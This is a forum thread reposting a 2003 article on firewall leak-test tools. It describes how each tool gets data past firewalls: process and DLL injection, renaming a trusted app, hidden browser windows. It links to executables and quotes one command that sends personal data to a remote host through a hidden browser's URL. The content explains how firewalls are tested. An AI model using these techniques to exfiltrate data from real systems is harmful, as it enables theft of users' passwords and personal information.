Results 1 to 2 of 2

Thread: Malicious Code That can Slip Past it all

  1. #1
    Super Moderator Super Moderator Big Booger's Avatar
    Join Date
    Apr 2002
    Location
    JAPAN
    Posts
    10,941

    Malicious Code That can Slip Past it all

    http://www.pcflank.com/art41b.htm

    That article is dated August 2003, so it is rather old, but the content is nonetheless important:

    Leak tests descriptions


    LeakTest by Steve Gibson
    http://www.grc.com/lt/leaktest.htm

    The grandpa of all leak tests created by the owner of GRC.com, Steve Gibson.

    While the majority of firewalls rely on application trust levels set by the user, it was shown that just replacing a trusted application with a malicious agent of the same name would often make a firewall allow the outbound traffic from the malicious program with all the privileges granted to the real app.

    Recent versions of most firewalls have this bug fixed by performing checksums on the trusted applications and warning the user if a dissimilar copy of the application is identified.

    TooLeaky by Bob Sundling
    http://www.tooleaky.zensoft.com

    This is another veteran test that uses a more advanced technique than Gibson’s test.

    It uses the system's web browser to transmit information without the knowledge of the user. The tool opens your default web browser with the following command line:

    iexplore.exe http://grc.com/lt/leaktest.htm?PersonalInfoGoesHere

    The browser window is hidden so the user doesn’t notice it. If the web browser is allowed to access port 80 by the firewall then any personal data can be transmitted to the remote address (GRC.com in this case). This info can be anything including the user's passwords, credit card information and much more.

    FireHole by Robin Keir
    http://www.keir.net/firehole.html

    Firehole—created by Robin Keir, the lead network security programmer of Foundstone—uses the default web browser to transmit data to a remote host, but its technique is much more sophisticated than TooLeaky’s.

    "FireHole" installs a DLL file (having an intercept function) on the user's computer. This DLL gets loaded up with any subsequent program and is treated as being in the same process space as the other program. So, "FireHole" uses the process space of the system's default browser and as a result is almost certainly trusted by the firewall.

    Yalta by Soft4Ever
    http://www.soft4ever.com/security_test/En/index.htm

    Yalta was created by the developers of Look'n'Stop firewall. Yalta acts as a Trojan trying to send a message to a remote address, bypassing all firewall filters.

    Yalta is two tests: the Classical Leak Test and the Enhanced Leak Test. We tested all firewalls with Yalta's Classical Leak Test.

    pcAudit by Internet Security Alliance
    http://www.pcinternetpatrol.com/

    This is a relatively new tool that uses a DLL injection technique to hide its presence from a firewall. pcAudit injects its code into a DLL of a trusted application and then attempts to call back to a remote computer. Some firewalls allow all communications from trusted applications and do not spot a malicious DLL.

    Atelier Web Firewall Tester (AWFT) 3.0
    http://www.atelierweb.com/awft/

    AWFT consists of six tests, each giving points to a firewall if it passes. The maximum amount of points you can get is 10.

    AWFT tests are similar to the other leak tests; “DLL injection”, “address space injection”, “hidden browser window” are all used.

    Thermite by Oliver Lavery
    Download link: http://perso.wanadoo.fr/jugesoftware...s/thermite.exe
    Author email: oliverlavery@hotmail.com

    Thermite is tiny, but a very tricky tool that does not use DLL injection. Instead, it injects itself into the address space of a trusted process (application). Most firewalls cannot detect it as this technique makes malicious code almost totally invisible to the firewall! Being undetected Thermite can send out any info from your PC.

    CopyCat
    Download link: http://mc.webm.ru/copycat.exe

    CopyCat, like Thermite, also injects itself into the address space of a trusted process. However, CopyCat enables the user to select the application that CopyCat is to be injected into.
    Seems like there are quite a few tricks to get at your system data. When compromised using these tricks, your system is an open book..

  2. #2
    Titanium Member
    Join Date
    Jul 2002
    Location
    blk helo target, WA
    Posts
    3,536

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •